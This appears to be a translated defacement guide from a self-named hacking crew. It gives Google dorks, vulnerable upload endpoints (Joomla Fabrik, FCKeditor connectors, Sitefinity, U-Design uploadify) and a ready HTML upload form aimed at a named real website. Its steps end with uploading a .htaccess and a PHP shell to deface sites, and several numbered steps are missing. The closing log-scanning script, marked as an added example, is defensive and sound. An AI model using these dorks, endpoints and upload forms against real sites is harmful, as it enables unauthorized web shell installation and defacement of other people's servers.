X-4R4Y
1. Deface Poc Bypass Admin
Dork : inurl:/?mnux=login
(develop it further yourself)
Done .
Deface Poc Webdav
2. Open Webdav
3. Click Webdav
5. Click Settings
8. Click OK
Dork : "File Upload Manager v1.3" "rename to" "file types allowed"
(develop it further yourselves)
1. Dork on Google
Dork:
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:
inurl:index.php?option=com_fabrik&view= site:
Exploit :
/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Example:
www.target.com/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
<title>~ACT~</title>
<center> <body><img alt="Gambar Koala" src="https://4.bp.blogspot.com/-
9PXpouwGn2A/Wmfq3SmQT9I/AAAAAAAAAAg/ZqsgdcxDL74SbN2oiOFmFbuo-
9ma9wSSQCPcBGAYYCw/s1600/IMG-20180122-WA0030.jpg"/>
<br>
<br>
<font size="10">CSRF ASSASSIN CYBER TEAM </h1><br><br>
<form method="POST" action=" Di sini Link Website atau Domain
Website/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&m
ethod=ajax_upload" enctype="multipart/form-data">
<input type="file" name="file"><button>Upload</button>
</form>
</center><br></font>
Example:
<title>~ACT~</title>
<center> <body><img alt="Gambar Koala" src="https://4.bp.blogspot.com/-
9PXpouwGn2A/Wmfq3SmQT9I/AAAAAAAAAAg/ZqsgdcxDL74SbN2oiOFmFbuo-
9ma9wSSQCPcBGAYYCw/s1600/IMG-20180122-WA0030.jpg"/>
<br>
<br>
<font size="10">CSRF ASSASSIN CYBER TEAM </h1><br><br>
<form method="POST"
action="http://www.portofcall.com/index.php?option=com_fabrik&format=raw&task=plugin.plugi
nAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data">
<input type="file" name="file"><button>Upload</button>
</form>
</center><br></font>
5. Open the csrf file, then upload the .htaccess that is in the file, then go back to the previous page, then upload your Shell.php
6. Once it is uploaded, it is time to deface the index
Dork : inurl:examples/uploadbutton.html
(develop it further)
1. Dorking Google
3. Click Upload
5. Then OK
Dork : inurl:”/html/siswa.php?”
Inurl:”/html/guru.php?”
Inurl:”/html/alumni.php?”
1. Dorking Google
3. Enter the exploit
/editor/filemanager/connector/test.html
Or
/editor/filemanager/connector/uploadtest.html
4. Just upload
Upload extensions (txt, jpg, png, jpeg, etc.)
3. Enter the exploit
/sitefinity/UserControls/dialog/DocumentEditorDialog.aspx
6. Click OK
Done :v
Deface Poc U-Design Themes
Dork : inurl:themes/u-design/ext:jpgimage
indexof/''''uploadify.php''''wp-content
Exploit : :/wp-content/themes/u-design//scripts/admin/uploadify/uploadify.php
1. Dork on Google
8. Then "our Bitch" appears; open that link. If the number 1 is shown, your shell has been uploaded
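For site owners, the request paths listed on this page are usable as detection indicators in web server access logs. The following is an added example, not part of the original page: it assumes the Apache/nginx combined log format, the function names are hypothetical, and the log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path suffixes copied from the page, lower-cased; repeated slashes are collapsed before matching.
UPLOAD_PATHS = {
    "/editor/filemanager/connector/test.html": "filemanager connector test page",
    "/editor/filemanager/connector/uploadtest.html": "filemanager connector upload test page",
    "/sitefinity/usercontrols/dialog/documenteditordialog.aspx": "Sitefinity document editor dialog",
    "/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php": "U-Design uploadify.php",
    "/examples/uploadbutton.html": "upload button example page",
}
# Assumption: combined log format (client, ident, user, [time], "METHOD target proto", status, ...).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def classify(target):
    """Return a label if the request target matches an endpoint named on the page."""
    parts = urlsplit(target)
    path = re.sub(r"/{2,}", "/", unquote(parts.path)).lower()
    query = {k.lower(): v[-1].lower() for k, v in parse_qs(parts.query).items()}
    # Fabrik: match on the decoded parameters so parameter order and case do not matter.
    if (query.get("option") == "com_fabrik" and query.get("plugin") == "fileupload"
            and query.get("method") == "ajax_upload"):
        return "Fabrik fileupload ajax_upload"
    for suffix, label in UPLOAD_PATHS.items():
        if path.endswith(suffix):
            return label
    return None

def scan(lines):
    """Return (client, method, status, label) for every matching log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            client, method, target, status = m.groups()
            label = classify(target)
            if label:
                hits.append((client, method, int(status), label))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "POST /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.7 - - [12/Mar/2024:10:01:09 +0000] "GET /wp-content/themes/u-design//scripts/admin/uploadify/uploadify.php HTTP/1.1" 404 0 "-" "-"',
    '198.51.100.9 - - [12/Mar/2024:10:02:00 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 4096 "-" "-"',
    '198.51.100.20 - - [12/Mar/2024:10:03:11 +0000] "GET /Editor/FileManager/connector/uploadtest.html HTTP/1.1" 200 900 "-" "-"',
    '198.51.100.20 - - [12/Mar/2024:10:03:40 +0000] "POST /index.php?method=ajax_upload&plugin=fileupload&option=com_fabrik HTTP/1.1" 403 0 "-" "-"',
]
if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Hits where a POST received a 2xx status are the ones to triage first, by checking the upload directories for unexpected `.htaccess` or `.php` files.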